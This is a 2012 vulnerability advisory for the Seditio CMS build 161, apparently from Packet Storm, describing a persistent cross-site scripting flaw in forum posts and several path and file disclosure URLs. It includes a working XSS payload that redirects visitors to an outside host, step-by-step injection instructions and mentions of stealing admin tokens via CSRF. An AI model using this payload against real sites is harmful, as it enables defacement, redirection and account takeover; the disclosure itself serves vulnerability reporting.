Seditio Build 161 Cross Site Scripting / Information Disclosure

2012-03-29T00:00:00
ID PACKETSTORM:111320
Type packetstorm
Reporter Akastep
Modified 2012-03-29T00:00:00

Description

                                        
                                            `==========================================================  
Vulnerable Software: seditio-build161  
==========================================================  
Downloaded from:http://neocrome.net/page.php?id=2447&a=dl  
  
# md5sum sed*.rar  
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar  
  
Installation:Standart (i assume with default settings)  
  
Tested:  
==========================================================  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
==========================================================  
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:  
==========================================================  
Exploitation:  
Create new topic(/forums.php?m=newtopic&s=1)  
using the following details:  
  
Topic Title: Whatever you want.  
Topic Description: Whatever you want.  
Body:  
Inject this:   
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='http://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>  
  
Post the topic.  
  
Then you'll see it as plaintext for first time.  
Click the *EDIT* button but do not touch anything after this and simply Push the *UPDATE* button.  
After update you'll return to your post.Try to over your mouse over the link.  
  
Same rules and exploitation also applies to *Reply* section.  
Remember you do not need touch anything after *edit* button you need only UPDATE the topic with your "payload" and thats all.  
@Print screen on success pwn:  
http://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png  
  
Other attacks also possible using XSS to steal security tokens and exploitate CSRF (change password or deface site automatically) using   
document.body.innerHTML(to steal administrator tokens)  
==========================================================  
Ok now about Info And Path Disclosure:  
Try to Direct access:(Also previous versions too suffers from Info and Path disclosure)  
  
http://192.168.0.15/learn/9/seditio/view.php  
  
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21  
@http://www.neocrome.net/view.php  
  
http://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php  
  
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37  
  
  
http://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php  
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450  
  
  
http://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php  
  
  
Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37  
  
Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104  
==============================================================================================================================  
http://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php  
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21  
  
@http://www.neocrome.net/system/core/view/view.inc.php  
  
===============================================================================================================================  
Info disclosure:  
http://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql  
http://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql  
  
http://192.168.0.15/learn/9/seditio/system/install/install.parser.sql  
IMO Needs at least simply .htaccess rule to protect from eyes this files.  
===============================================================================================================================  
  
/AkaStep ^_^  
1332959725  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`